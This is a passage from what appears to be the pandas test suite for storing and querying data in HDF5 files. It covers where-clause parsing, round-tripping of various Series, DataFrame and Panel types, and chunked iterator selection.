"minor_axis=['A', 'B'] and "
"items=['ItemA', 'ItemB']"))
expected = p4d.truncate(after='20000108').reindex(
minor=['A', 'B'], items=['ItemA', 'ItemB'])
assert_panel4d_equal(result, expected)
with catch_warnings(record=True):
# valid terms
terms = [('major_axis=20121114'),
('major_axis>20121114'),
(("major_axis=['20121114', '20121114']"),),
('major_axis=datetime.datetime(2012, 11, 14)'),
'major_axis> 20121114',
'major_axis >20121114',
'major_axis > 20121114',
(("minor_axis=['A', 'B']"),),
(("minor_axis=['A', 'B']"),),
((("minor_axis==['A', 'B']"),),),
(("items=['ItemA', 'ItemB']"),),
('items=ItemA'),
]
for t in terms:
store.select('wp', t)
store.select('p4d', t)
# valid for p4d only
terms = ["labels=['l1', 'l2']"]
for t in terms:
store.select('p4d', t)
with tm.assert_raises_regex(
TypeError, 'Only named functions are supported'):
store.select(
'wp',
'major_axis == (lambda x: x)("20130101")')
with catch_warnings(record=True):
# check USub node parsing
res = store.select('wpneg', 'items == -1')
expected = Panel({-1: wpneg[-1]})
tm.assert_panel_equal(res, expected)
with tm.assert_raises_regex(NotImplementedError,
'Unary addition '
'not supported'):
store.select('wpneg', 'items == +1')
def test_term_compat(self):
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
wp = Panel(np.random.randn(2, 5, 4), items=['Item1', 'Item2'],
major_axis=date_range('1/1/2000', periods=5),
minor_axis=['A', 'B', 'C', 'D'])
store.append('wp', wp)
result = store.select(
'wp', where=("major_axis>20000102 "
"and minor_axis=['A', 'B']"))
expected = wp.loc[:, wp.major_axis >
Timestamp('20000102'), ['A', 'B']]
assert_panel_equal(result, expected)
store.remove('wp', 'major_axis>20000103')
result = store.select('wp')
expected = wp.loc[:, wp.major_axis <= Timestamp('20000103'), :]
assert_panel_equal(result, expected)
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
wp = Panel(np.random.randn(2, 5, 4),
items=['Item1', 'Item2'],
major_axis=date_range('1/1/2000', periods=5),
minor_axis=['A', 'B', 'C', 'D'])
store.append('wp', wp)
# stringified datetimes
result = store.select(
'wp', 'major_axis>datetime.datetime(2000, 1, 2)')
expected = wp.loc[:, wp.major_axis > Timestamp('20000102')]
assert_panel_equal(result, expected)
result = store.select(
'wp', 'major_axis>datetime.datetime(2000, 1, 2)')
expected = wp.loc[:, wp.major_axis > Timestamp('20000102')]
assert_panel_equal(result, expected)
result = store.select(
'wp',
"major_axis=[datetime.datetime(2000, 1, 2, 0, 0), "
"datetime.datetime(2000, 1, 3, 0, 0)]")
expected = wp.loc[:, [Timestamp('20000102'),
Timestamp('20000103')]]
assert_panel_equal(result, expected)
result = store.select(
'wp', "minor_axis=['A', 'B']")
expected = wp.loc[:, :, ['A', 'B']]
assert_panel_equal(result, expected)
def test_same_name_scoping(self):
with ensure_clean_store(self.path) as store:
import pandas as pd
df = DataFrame(np.random.randn(20, 2),
index=pd.date_range('20130101', periods=20))
store.put('df', df, format='table')
expected = df[df.index > pd.Timestamp('20130105')]
import datetime # noqa
result = store.select('df', 'index>datetime.datetime(2013,1,5)')
assert_frame_equal(result, expected)
from datetime import datetime # noqa
# technically an error, but allow it
result = store.select('df', 'index>datetime.datetime(2013,1,5)')
assert_frame_equal(result, expected)
result = store.select('df', 'index>datetime(2013,1,5)')
assert_frame_equal(result, expected)
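# Identifiers inside a where string are resolved against the caller's
# namespace, so both the datetime module and the datetime class work in the
# expressions above, and plain Python variables can be referenced by name.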
def test_series(self):
s = tm.makeStringSeries()
self._check_roundtrip(s, tm.assert_series_equal)
ts = tm.makeTimeSeries()
self._check_roundtrip(ts, tm.assert_series_equal)
ts2 = Series(ts.index, Index(ts.index, dtype=object))
self._check_roundtrip(ts2, tm.assert_series_equal)
ts3 = Series(ts.values, Index(np.asarray(ts.index, dtype=object),
dtype=object))
self._check_roundtrip(ts3, tm.assert_series_equal,
check_index_type=False)
def test_sparse_series(self):
s = tm.makeStringSeries()
s.iloc[3:5] = np.nan
ss = s.to_sparse()
self._check_roundtrip(ss, tm.assert_series_equal,
check_series_type=True)
ss2 = s.to_sparse(kind='integer')
self._check_roundtrip(ss2, tm.assert_series_equal,
check_series_type=True)
ss3 = s.to_sparse(fill_value=0)
self._check_roundtrip(ss3, tm.assert_series_equal,
check_series_type=True)
def test_sparse_frame(self):
s = tm.makeDataFrame()
s.iloc[3:5, 1:3] = np.nan
s.iloc[8:10, -2] = np.nan
ss = s.to_sparse()
self._check_double_roundtrip(ss, tm.assert_frame_equal,
check_frame_type=True)
ss2 = s.to_sparse(kind='integer')
self._check_double_roundtrip(ss2, tm.assert_frame_equal,
check_frame_type=True)
ss3 = s.to_sparse(fill_value=0)
self._check_double_roundtrip(ss3, tm.assert_frame_equal,
check_frame_type=True)
def test_float_index(self):
# GH #454
index = np.random.randn(10)
s = Series(np.random.randn(10), index=index)
self._check_roundtrip(s, tm.assert_series_equal)
def test_tuple_index(self):
# GH #492
col = np.arange(10)
idx = [(0., 1.), (2., 3.), (4., 5.)]
data = np.random.randn(30).reshape((3, 10))
DF = DataFrame(data, index=idx, columns=col)
with catch_warnings(record=True):
self._check_roundtrip(DF, tm.assert_frame_equal)
def test_index_types(self):
with catch_warnings(record=True):
values = np.random.randn(2)
func = lambda l, r: tm.assert_series_equal(l, r,
check_dtype=True,
check_index_type=True,
check_series_type=True)
with catch_warnings(record=True):
ser = Series(values, [0, 'y'])
self._check_roundtrip(ser, func)
with catch_warnings(record=True):
ser = Series(values, [datetime.datetime.today(), 0])
self._check_roundtrip(ser, func)
with catch_warnings(record=True):
ser = Series(values, ['y', 0])
self._check_roundtrip(ser, func)
with catch_warnings(record=True):
ser = Series(values, [datetime.date.today(), 'a'])
self._check_roundtrip(ser, func)
with catch_warnings(record=True):
ser = Series(values, [0, 'y'])
self._check_roundtrip(ser, func)
ser = Series(values, [datetime.datetime.today(), 0])
self._check_roundtrip(ser, func)
ser = Series(values, ['y', 0])
self._check_roundtrip(ser, func)
ser = Series(values, [datetime.date.today(), 'a'])
self._check_roundtrip(ser, func)
ser = Series(values, [1.23, 'b'])
self._check_roundtrip(ser, func)
ser = Series(values, [1, 1.53])
self._check_roundtrip(ser, func)
ser = Series(values, [1, 5])
self._check_roundtrip(ser, func)
ser = Series(values, [datetime.datetime(
2012, 1, 1), datetime.datetime(2012, 1, 2)])
self._check_roundtrip(ser, func)
def test_timeseries_preepoch(self):
dr = bdate_range('1/1/1940', '1/1/1960')
ts = Series(np.random.randn(len(dr)), index=dr)
try:
self._check_roundtrip(ts, tm.assert_series_equal)
except OverflowError:
pytest.skip('known failure on some windows platforms')
@pytest.mark.parametrize("compression", [
False, pytest.param(True, marks=td.skip_if_windows_python_3)
])
def test_frame(self, compression):
df = tm.makeDataFrame()
# put in some random NAs
df.values[0, 0] = np.nan
df.values[5, 3] = np.nan
self._check_roundtrip_table(df, tm.assert_frame_equal,
compression=compression)
self._check_roundtrip(df, tm.assert_frame_equal,
compression=compression)
tdf = tm.makeTimeDataFrame()
self._check_roundtrip(tdf, tm.assert_frame_equal,
compression=compression)
with ensure_clean_store(self.path) as store:
# not consolidated
df['foo'] = np.random.randn(len(df))
store['df'] = df
recons = store['df']
assert recons._data.is_consolidated()
# empty
self._check_roundtrip(df[:0], tm.assert_frame_equal)
def test_empty_series_frame(self):
s0 = Series()
s1 = Series(name='myseries')
df0 = DataFrame()
df1 = DataFrame(index=['a', 'b', 'c'])
df2 = DataFrame(columns=['d', 'e', 'f'])
self._check_roundtrip(s0, tm.assert_series_equal)
self._check_roundtrip(s1, tm.assert_series_equal)
self._check_roundtrip(df0, tm.assert_frame_equal)
self._check_roundtrip(df1, tm.assert_frame_equal)
self._check_roundtrip(df2, tm.assert_frame_equal)
def test_empty_series(self):
for dtype in [np.int64, np.float64, np.object, 'm8[ns]', 'M8[ns]']:
s = Series(dtype=dtype)
self._check_roundtrip(s, tm.assert_series_equal)
def test_can_serialize_dates(self):
rng = [x.date() for x in bdate_range('1/1/2000', '1/30/2000')]
frame = DataFrame(np.random.randn(len(rng), 4), index=rng)
self._check_roundtrip(frame, tm.assert_frame_equal)
def test_store_hierarchical(self):
index = MultiIndex(levels=[['foo', 'bar', 'baz', 'qux'],
['one', 'two', 'three']],
labels=[[0, 0, 0, 1, 1, 2, 2, 3, 3, 3],
[0, 1, 2, 0, 1, 1, 2, 0, 1, 2]],
names=['foo', 'bar'])
frame = DataFrame(np.random.randn(10, 3), index=index,
columns=['A', 'B', 'C'])
self._check_roundtrip(frame, tm.assert_frame_equal)
self._check_roundtrip(frame.T, tm.assert_frame_equal)
self._check_roundtrip(frame['A'], tm.assert_series_equal)
# check that the names are stored
with ensure_clean_store(self.path) as store:
store['frame'] = frame
recons = store['frame']
tm.assert_frame_equal(recons, frame)
def test_store_index_name(self):
df = tm.makeDataFrame()
df.index.name = 'foo'
with ensure_clean_store(self.path) as store:
store['frame'] = df
recons = store['frame']
tm.assert_frame_equal(recons, df)
def test_store_index_name_with_tz(self):
# GH 13884
df = pd.DataFrame({'A': [1, 2]})
df.index = pd.DatetimeIndex([1234567890123456787, 1234567890123456788])
df.index = df.index.tz_localize('UTC')
df.index.name = 'foo'
with ensure_clean_store(self.path) as store:
store.put('frame', df, format='table')
recons = store['frame']
tm.assert_frame_equal(recons, df)
@pytest.mark.parametrize('table_format', ['table', 'fixed'])
def test_store_index_name_numpy_str(self, table_format):
# GH #13492
idx = pd.Index(pd.to_datetime([datetime.date(2000, 1, 1),
datetime.date(2000, 1, 2)]),
name=u('cols\u05d2'))
idx1 = pd.Index(pd.to_datetime([datetime.date(2010, 1, 1),
datetime.date(2010, 1, 2)]),
name=u('rows\u05d0'))
df = pd.DataFrame(np.arange(4).reshape(2, 2), columns=idx, index=idx1)
# This used to fail, returning numpy strings instead of python strings.
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', format=table_format)
df2 = read_hdf(path, 'df')
assert_frame_equal(df, df2, check_names=True)
assert type(df2.index.name) == text_type
assert type(df2.columns.name) == text_type
def test_store_series_name(self):
df = tm.makeDataFrame()
series = df['A']
with ensure_clean_store(self.path) as store:
store['series'] = series
recons = store['series']
tm.assert_series_equal(recons, series)
@pytest.mark.parametrize("compression", [
False, pytest.param(True, marks=td.skip_if_windows_python_3)
])
def test_store_mixed(self, compression):
def _make_one():
df = tm.makeDataFrame()
df['obj1'] = 'foo'
df['obj2'] = 'bar'
df['bool1'] = df['A'] > 0
df['bool2'] = df['B'] > 0
df['int1'] = 1
df['int2'] = 2
return df._consolidate()
df1 = _make_one()
df2 = _make_one()
self._check_roundtrip(df1, tm.assert_frame_equal)
self._check_roundtrip(df2, tm.assert_frame_equal)
with ensure_clean_store(self.path) as store:
store['obj'] = df1
tm.assert_frame_equal(store['obj'], df1)
store['obj'] = df2
tm.assert_frame_equal(store['obj'], df2)
# check that can store Series of all of these types
self._check_roundtrip(df1['obj1'], tm.assert_series_equal,
compression=compression)
self._check_roundtrip(df1['bool1'], tm.assert_series_equal,
compression=compression)
self._check_roundtrip(df1['int1'], tm.assert_series_equal,
compression=compression)
def test_wide(self):
with catch_warnings(record=True):
wp = tm.makePanel()
self._check_roundtrip(wp, assert_panel_equal)
def test_select_with_dups(self):
# single dtypes
df = DataFrame(np.random.randn(10, 4), columns=['A', 'A', 'B', 'B'])
df.index = date_range('20130101 9:30', periods=10, freq='T')
with ensure_clean_store(self.path) as store:
store.append('df', df)
result = store.select('df')
expected = df
assert_frame_equal(result, expected, by_blocks=True)
result = store.select('df', columns=df.columns)
expected = df
assert_frame_equal(result, expected, by_blocks=True)
result = store.select('df', columns=['A'])
expected = df.loc[:, ['A']]
assert_frame_equal(result, expected)
# dups across dtypes
df = concat([DataFrame(np.random.randn(10, 4),
columns=['A', 'A', 'B', 'B']),
DataFrame(np.random.randint(0, 10, size=20)
.reshape(10, 2),
columns=['A', 'C'])],
axis=1)
df.index = date_range('20130101 9:30', periods=10, freq='T')
with ensure_clean_store(self.path) as store:
store.append('df', df)
result = store.select('df')
expected = df
assert_frame_equal(result, expected, by_blocks=True)
result = store.select('df', columns=df.columns)
expected = df
assert_frame_equal(result, expected, by_blocks=True)
expected = df.loc[:, ['A']]
result = store.select('df', columns=['A'])
assert_frame_equal(result, expected, by_blocks=True)
expected = df.loc[:, ['B', 'A']]
result = store.select('df', columns=['B', 'A'])
assert_frame_equal(result, expected, by_blocks=True)
# duplicates on both index and columns
with ensure_clean_store(self.path) as store:
store.append('df', df)
store.append('df', df)
expected = df.loc[:, ['B', 'A']]
expected = concat([expected, expected])
result = store.select('df', columns=['B', 'A'])
assert_frame_equal(result, expected, by_blocks=True)
def test_wide_table_dups(self):
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
wp = tm.makePanel()
store.put('panel', wp, format='table')
store.put('panel', wp, format='table', append=True)
recons = store['panel']
assert_panel_equal(recons, wp)
def test_long(self):
def _check(left, right):
assert_panel_equal(left.to_panel(), right.to_panel())
with catch_warnings(record=True):
wp = tm.makePanel()
self._check_roundtrip(wp.to_frame(), _check)
def test_longpanel(self):
pass
def test_overwrite_node(self):
with ensure_clean_store(self.path) as store:
store['a'] = tm.makeTimeDataFrame()
ts = tm.makeTimeSeries()
store['a'] = ts
tm.assert_series_equal(store['a'], ts)
def test_sparse_with_compression(self):
# GH 2931
# make sparse dataframe
arr = np.random.binomial(n=1, p=.01, size=(1000, 10))
df = DataFrame(arr).to_sparse(fill_value=0)
# case 1: store uncompressed
self._check_double_roundtrip(df, tm.assert_frame_equal,
compression=False,
check_frame_type=True)
# case 2: store compressed (works)
self._check_double_roundtrip(df, tm.assert_frame_equal,
compression='zlib',
check_frame_type=True)
# set one series to be completely sparse
df[0] = np.zeros(1000)
# case 3: store df with completely sparse series uncompressed
self._check_double_roundtrip(df, tm.assert_frame_equal,
compression=False,
check_frame_type=True)
# case 4: try storing df with completely sparse series compressed
# (fails)
self._check_double_roundtrip(df, tm.assert_frame_equal,
compression='zlib',
check_frame_type=True)
def test_select(self):
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
wp = tm.makePanel()
# put/select ok
_maybe_remove(store, 'wp')
store.put('wp', wp, format='table')
store.select('wp')
# non-table ok (where = None)
_maybe_remove(store, 'wp')
store.put('wp2', wp)
store.select('wp2')
# selection on the non-indexable with a large number of columns
wp = Panel(np.random.randn(100, 100, 100),
items=['Item%03d' % i for i in range(100)],
major_axis=date_range('1/1/2000', periods=100),
minor_axis=['E%03d' % i for i in range(100)])
_maybe_remove(store, 'wp')
store.append('wp', wp)
items = ['Item%03d' % i for i in range(80)]
result = store.select('wp', 'items=items')
expected = wp.reindex(items=items)
assert_panel_equal(expected, result)
# selecting a non-table with a where
# pytest.raises(ValueError, store.select,
# 'wp2', ('column', ['A', 'D']))
# select with columns=
df = tm.makeTimeDataFrame()
_maybe_remove(store, 'df')
store.append('df', df)
result = store.select('df', columns=['A', 'B'])
expected = df.reindex(columns=['A', 'B'])
tm.assert_frame_equal(expected, result)
# equivalently
result = store.select('df', [("columns=['A', 'B']")])
expected = df.reindex(columns=['A', 'B'])
tm.assert_frame_equal(expected, result)
# with a data column
_maybe_remove(store, 'df')
store.append('df', df, data_columns=['A'])
result = store.select('df', ['A > 0'], columns=['A', 'B'])
expected = df[df.A > 0].reindex(columns=['A', 'B'])
tm.assert_frame_equal(expected, result)
# all as data columns
_maybe_remove(store, 'df')
store.append('df', df, data_columns=True)
result = store.select('df', ['A > 0'], columns=['A', 'B'])
expected = df[df.A > 0].reindex(columns=['A', 'B'])
tm.assert_frame_equal(expected, result)
# with a data column, but different columns
_maybe_remove(store, 'df')
store.append('df', df, data_columns=['A'])
result = store.select('df', ['A > 0'], columns=['C', 'D'])
expected = df[df.A > 0].reindex(columns=['C', 'D'])
tm.assert_frame_equal(expected, result)
def test_select_dtypes(self):
with ensure_clean_store(self.path) as store:
# with a Timestamp data column (GH #2637)
df = DataFrame(dict(
ts=bdate_range('2012-01-01', periods=300),
A=np.random.randn(300)))
_maybe_remove(store, 'df')
store.append('df', df, data_columns=['ts', 'A'])
result = store.select('df', "ts>=Timestamp('2012-02-01')")
expected = df[df.ts >= Timestamp('2012-02-01')]
tm.assert_frame_equal(expected, result)
# bool columns (GH #2849)
df = DataFrame(np.random.randn(5, 2), columns=['A', 'B'])
df['object'] = 'foo'
df.loc[4:5, 'object'] = 'bar'
df['boolv'] = df['A'] > 0
_maybe_remove(store, 'df')
store.append('df', df, data_columns=True)
expected = (df[df.boolv == True] # noqa
.reindex(columns=['A', 'boolv']))
for v in [True, 'true', 1]:
result = store.select('df', 'boolv == %s' % str(v),
columns=['A', 'boolv'])
tm.assert_frame_equal(expected, result)
expected = (df[df.boolv == False] # noqa
.reindex(columns=['A', 'boolv']))
for v in [False, 'false', 0]:
result = store.select(
'df', 'boolv == %s' % str(v), columns=['A', 'boolv'])
tm.assert_frame_equal(expected, result)
# integer index
df = DataFrame(dict(A=np.random.rand(20), B=np.random.rand(20)))
_maybe_remove(store, 'df_int')
store.append('df_int', df)
result = store.select(
'df_int', "index<10 and columns=['A']")
expected = df.reindex(index=list(df.index)[0:10], columns=['A'])
tm.assert_frame_equal(expected, result)
# float index
df = DataFrame(dict(A=np.random.rand(20), B=np.random.rand(20)),
index=np.arange(20, dtype='f8'))
_maybe_remove(store, 'df_float')
store.append('df_float', df)
result = store.select(
'df_float', "index<10.0 and columns=['A']")
expected = df.reindex(index=list(df.index)[0:10], columns=['A'])
tm.assert_frame_equal(expected, result)
with ensure_clean_store(self.path) as store:
# floats w/o NaN
df = DataFrame(
dict(cols=range(11), values=range(11)), dtype='float64')
df['cols'] = (df['cols'] + 10).apply(str)
store.append('df1', df, data_columns=True)
result = store.select(
'df1', where='values>2.0')
expected = df[df['values'] > 2.0]
tm.assert_frame_equal(expected, result)
# floats with NaN
df.iloc[0] = np.nan
expected = df[df['values'] > 2.0]
store.append('df2', df, data_columns=True, index=False)
result = store.select(
'df2', where='values>2.0')
tm.assert_frame_equal(expected, result)
# https://github.com/PyTables/PyTables/issues/282
# bug in selection when 0th row has a np.nan and an index
# store.append('df3',df,data_columns=True)
# result = store.select(
# 'df3', where='values>2.0')
# tm.assert_frame_equal(expected, result)
# a NaN that is not in the first position: float with NaN is ok too
df = DataFrame(
dict(cols=range(11), values=range(11)), dtype='float64')
df['cols'] = (df['cols'] + 10).apply(str)
df.iloc[1] = np.nan
expected = df[df['values'] > 2.0]
store.append('df4', df, data_columns=True)
result = store.select(
'df4', where='values>2.0')
tm.assert_frame_equal(expected, result)
# test selection with comparison against numpy scalar
# GH 11283
with ensure_clean_store(self.path) as store:
df = tm.makeDataFrame()
expected = df[df['A'] > 0]
store.append('df', df, data_columns=True)
np_zero = np.float64(0) # noqa
result = store.select('df', where=["A>np_zero"])
tm.assert_frame_equal(expected, result)
def test_select_with_many_inputs(self):
with ensure_clean_store(self.path) as store:
df = DataFrame(dict(ts=bdate_range('2012-01-01', periods=300),
A=np.random.randn(300),
B=range(300),
users=['a'] * 50 + ['b'] * 50 + ['c'] * 100 +
['a%03d' % i for i in range(100)]))
_maybe_remove(store, 'df')
store.append('df', df, data_columns=['ts', 'A', 'B', 'users'])
# regular select
result = store.select('df', "ts>=Timestamp('2012-02-01')")
expected = df[df.ts >= Timestamp('2012-02-01')]
tm.assert_frame_equal(expected, result)
# small selector
result = store.select(
'df',
"ts>=Timestamp('2012-02-01') & users=['a','b','c']")
expected = df[(df.ts >= Timestamp('2012-02-01')) &
df.users.isin(['a', 'b', 'c'])]
tm.assert_frame_equal(expected, result)
# big selector along the columns
selector = ['a', 'b', 'c'] + ['a%03d' % i for i in range(60)]
result = store.select(
'df',
"ts>=Timestamp('2012-02-01') and users=selector")
expected = df[(df.ts >= Timestamp('2012-02-01')) &
df.users.isin(selector)]
tm.assert_frame_equal(expected, result)
selector = range(100, 200)
result = store.select('df', 'B=selector')
expected = df[df.B.isin(selector)]
tm.assert_frame_equal(expected, result)
assert len(result) == 100
# big selector along the index
selector = Index(df.ts[0:100].values)
result = store.select('df', 'ts=selector')
expected = df[df.ts.isin(selector.values)]
tm.assert_frame_equal(expected, result)
assert len(result) == 100
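# List-like Python variables referenced in a where string are expanded into
# membership filters.  Minimal sketch (names as in this test):
#   selector = ['a', 'b', 'c']
#   store.select('df', 'users=selector')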
def test_select_iterator(self):
# single table
with ensure_clean_store(self.path) as store:
df = tm.makeTimeDataFrame(500)
_maybe_remove(store, 'df')
store.append('df', df)
expected = store.select('df')
results = [s for s in store.select('df', iterator=True)]
result = concat(results)
tm.assert_frame_equal(expected, result)
results = [s for s in store.select('df', chunksize=100)]
assert len(results) == 5
result = concat(results)
tm.assert_frame_equal(expected, result)
results = [s for s in store.select('df', chunksize=150)]
result = concat(results)
tm.assert_frame_equal(result, expected)
with ensure_clean_path(self.path) as path:
df = tm.makeTimeDataFrame(500)
df.to_hdf(path, 'df_non_table')
pytest.raises(TypeError, read_hdf, path,
'df_non_table', chunksize=100)
pytest.raises(TypeError, read_hdf, path,
'df_non_table', iterator=True)
with ensure_clean_path(self.path) as path:
df = tm.makeTimeDataFrame(500)
df.to_hdf(path, 'df', format='table')
results = [s for s in read_hdf(path, 'df', chunksize=100)]
result = concat(results)
assert len(results) == 5
tm.assert_frame_equal(result, df)
tm.assert_frame_equal(result, read_hdf(path, 'df'))
# multiple
with ensure_clean_store(self.path) as store:
df1 = tm.makeTimeDataFrame(500)
store.append('df1', df1, data_columns=True)
df2 = tm.makeTimeDataFrame(500).rename(
columns=lambda x: "%s_2" % x)
df2['foo'] = 'bar'
store.append('df2', df2)
df = concat([df1, df2], axis=1)
# full selection
expected = store.select_as_multiple(
['df1', 'df2'], selector='df1')
results = [s for s in store.select_as_multiple(
['df1', 'df2'], selector='df1', chunksize=150)]
result = concat(results)
tm.assert_frame_equal(expected, result)
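# iterator=True and chunksize both return an iterator of DataFrame chunks;
# concatenating the chunks reproduces the full (optionally where-filtered)
# selection, which the following tests rely on.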
def test_select_iterator_complete_8014(self):
# GH 8014
# using iterator and where clause
chunksize = 1e4
# no iterator
with ensure_clean_store(self.path) as store:
expected = tm.makeTimeDataFrame(100064, 'S')
_maybe_remove(store, 'df')
store.append('df', expected)
beg_dt = expected.index[0]
end_dt = expected.index[-1]
# select w/o iteration and no where clause works
result = store.select('df')
tm.assert_frame_equal(expected, result)
# select w/o iterator and where clause, single term, begin
# of range, works
where = "index >= '%s'" % beg_dt
result = store.select('df', where=where)
tm.assert_frame_equal(expected, result)
# select w/o iterator and where clause, single term, end
# of range, works
where = "index <= '%s'" % end_dt
result = store.select('df', where=where)
tm.assert_frame_equal(expected, result)
# select w/o iterator and where clause, inclusive range,
# works
where = "index >= '%s' & index <= '%s'" % (beg_dt, end_dt)
result = store.select('df', where=where)
tm.assert_frame_equal(expected, result)
# with iterator, full range
with ensure_clean_store(self.path) as store:
expected = tm.makeTimeDataFrame(100064, 'S')
_maybe_remove(store, 'df')
store.append('df', expected)
beg_dt = expected.index[0]
end_dt = expected.index[-1]
# select w/iterator and no where clause works
results = [s for s in store.select('df', chunksize=chunksize)]
result = concat(results)
tm.assert_frame_equal(expected, result)
# select w/iterator and where clause, single term, begin of range
where = "index >= '%s'" % beg_dt
results = [s for s in store.select(
'df', where=where, chunksize=chunksize)]
result = concat(results)
tm.assert_frame_equal(expected, result)
# select w/iterator and where clause, single term, end of range
where = "index <= '%s'" % end_dt
results = [s for s in store.select(
'df', where=where, chunksize=chunksize)]
result = concat(results)
tm.assert_frame_equal(expected, result)
# select w/iterator and where clause, inclusive range
where = "index >= '%s' & index <= '%s'" % (beg_dt, end_dt)
results = [s for s in store.select(
'df', where=where, chunksize=chunksize)]
result = concat(results)
tm.assert_frame_equal(expected, result)
def test_select_iterator_non_complete_8014(self):
# GH 8014
# using iterator and where clause
chunksize = 1e4
# with iterator, non complete range
with ensure_clean_store(self.path) as store:
expected = tm.makeTimeDataFrame(100064, 'S')
_maybe_remove(store, 'df')
store.append('df', expected)
beg_dt = expected.index[1]
end_dt = expected.index[-2]
# select w/iterator and where clause, single term, begin of range
where = "index >= '%s'" % beg_dt
results = [s for s in store.select(
'df', where=where, chunksize=chunksize)]
result = concat(results)
rexpected = expected[expected.index >= beg_dt]
tm.assert_frame_equal(rexpected, result)
# select w/iterator and where clause, single term, end of range
where = "index <= '%s'" % end_dt
results = [s for s in store.select(
'df', where=where, chunksize=chunksize)]
result = concat(results)
rexpected = expected[expected.index <= end_dt]
tm.assert_frame_equal(rexpected, result)
# select w/iterator and where clause, inclusive range
where = "index >= '%s' & index <= '%s'" % (beg_dt, end_dt)
results = [s for s in store.select(
'df', where=where, chunksize=chunksize)]
result = concat(results)
rexpected = expected[(expected.index >= beg_dt) &
(expected.index <= end_dt)]
tm.assert_frame_equal(rexpected, result)
            # with iterator, where clause selecting an empty range
with ensure_clean_store(self.path) as store:
expected = tm.makeTimeDataFrame(100064, 'S')
_maybe_remove(store, 'df')
store.append('df', expected)
end_dt = expected.index[-1]
# select w/iterator and where clause, single term, begin of range
where = "index > '%s'" % end_dt
results = [s for s in store.select(
'df', where=where, chunksize=chunksize)]
assert 0 == len(results)
def test_select_iterator_many_empty_frames(self):
# GH 8014
# using iterator and where clause can return many empty
# frames.
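        # When the where clause restricts the range to (at most) the first
        # chunk, the iterator is expected to yield a single frame rather
        # than one empty frame per remaining chunk.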
chunksize = int(1e4)
# with iterator, range limited to the first chunk
with ensure_clean_store(self.path) as store:
expected = tm.makeTimeDataFrame(100000, 'S')
_maybe_remove(store, 'df')
store.append('df', expected)
beg_dt = expected.index[0]
end_dt = expected.index[chunksize - 1]
# select w/iterator and where clause, single term, begin of range
where = "index >= '%s'" % beg_dt
results = [s for s in store.select(
'df', where=where, chunksize=chunksize)]
result = concat(results)
rexpected = expected[expected.index >= beg_dt]
tm.assert_frame_equal(rexpected, result)
# select w/iterator and where clause, single term, end of range
where = "index <= '%s'" % end_dt
results = [s for s in store.select(
'df', where=where, chunksize=chunksize)]
assert len(results) == 1
result = concat(results)
rexpected = expected[expected.index <= end_dt]
tm.assert_frame_equal(rexpected, result)
# select w/iterator and where clause, inclusive range
where = "index >= '%s' & index <= '%s'" % (beg_dt, end_dt)
results = [s for s in store.select(
'df', where=where, chunksize=chunksize)]
            # should be exactly 1 chunk (this historically returned 10)
assert len(results) == 1
result = concat(results)
rexpected = expected[(expected.index >= beg_dt) &
(expected.index <= end_dt)]
tm.assert_frame_equal(rexpected, result)
# select w/iterator and where clause which selects
# *nothing*.
#
            # To be consistent with Python iteration idiom this should
            # return [], i.e. iterating over the result executes the loop
            # body zero times.
where = "index <= '%s' & index >= '%s'" % (beg_dt, end_dt)
results = [s for s in store.select(
'df', where=where, chunksize=chunksize)]
# should be []
assert len(results) == 0
def test_retain_index_attributes(self):
# GH 3499, losing frequency info on index recreation
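        # Round-tripping through a table store should keep index attributes
        # (freq, tz, name); appending data with a different freq is allowed
        # but resets the stored freq info to None.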
df = DataFrame(dict(
A=Series(lrange(3),
index=date_range('2000-1-1', periods=3, freq='H'))))
with ensure_clean_store(self.path) as store:
_maybe_remove(store, 'data')
store.put('data', df, format='table')
result = store.get('data')
tm.assert_frame_equal(df, result)
for attr in ['freq', 'tz', 'name']:
for idx in ['index', 'columns']:
assert (getattr(getattr(df, idx), attr, None) ==
getattr(getattr(result, idx), attr, None))
# try to append a table with a different frequency
with catch_warnings(record=True):
df2 = DataFrame(dict(
A=Series(lrange(3),
index=date_range('2002-1-1',
periods=3, freq='D'))))
store.append('data', df2)
assert store.get_storer('data').info['index']['freq'] is None
# this is ok
_maybe_remove(store, 'df2')
df2 = DataFrame(dict(
A=Series(lrange(3),
index=[Timestamp('20010101'), Timestamp('20010102'),
Timestamp('20020101')])))
store.append('df2', df2)
df3 = DataFrame(dict(
A=Series(lrange(3),
index=date_range('2002-1-1', periods=3,
freq='D'))))
store.append('df2', df3)
def test_retain_index_attributes2(self):
with ensure_clean_path(self.path) as path:
with catch_warnings(record=True):
df = DataFrame(dict(
A=Series(lrange(3),
index=date_range('2000-1-1',
periods=3, freq='H'))))
df.to_hdf(path, 'data', mode='w', append=True)
df2 = DataFrame(dict(
A=Series(lrange(3),
index=date_range('2002-1-1', periods=3,
freq='D'))))
df2.to_hdf(path, 'data', append=True)
idx = date_range('2000-1-1', periods=3, freq='H')
idx.name = 'foo'
df = DataFrame(dict(A=Series(lrange(3), index=idx)))
df.to_hdf(path, 'data', mode='w', append=True)
assert read_hdf(path, 'data').index.name == 'foo'
with catch_warnings(record=True):
idx2 = date_range('2001-1-1', periods=3, freq='H')
idx2.name = 'bar'
df2 = DataFrame(dict(A=Series(lrange(3), index=idx2)))
df2.to_hdf(path, 'data', append=True)
assert read_hdf(path, 'data').index.name is None
def test_panel_select(self):
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
wp = tm.makePanel()
store.put('wp', wp, format='table')
date = wp.major_axis[len(wp.major_axis) // 2]
crit1 = ('major_axis>=date')
crit2 = ("minor_axis=['A', 'D']")
result = store.select('wp', [crit1, crit2])
expected = wp.truncate(before=date).reindex(minor=['A', 'D'])
assert_panel_equal(result, expected)
result = store.select(
'wp', ['major_axis>="20000124"',
("minor_axis=['A', 'B']")])
expected = wp.truncate(
before='20000124').reindex(minor=['A', 'B'])
assert_panel_equal(result, expected)
def test_frame_select(self):
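        # Term('index>=date') resolves `date` from the local scope, and
        # column filters such as "columns=['A', 'D']" restrict which
        # columns come back from the table.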
df = tm.makeTimeDataFrame()
with ensure_clean_store(self.path) as store:
store.put('frame', df, format='table')
date = df.index[len(df) // 2]
crit1 = Term('index>=date')
assert crit1.env.scope['date'] == date
crit2 = ("columns=['A', 'D']")
crit3 = ('columns=A')
result = store.select('frame', [crit1, crit2])
expected = df.loc[date:, ['A', 'D']]
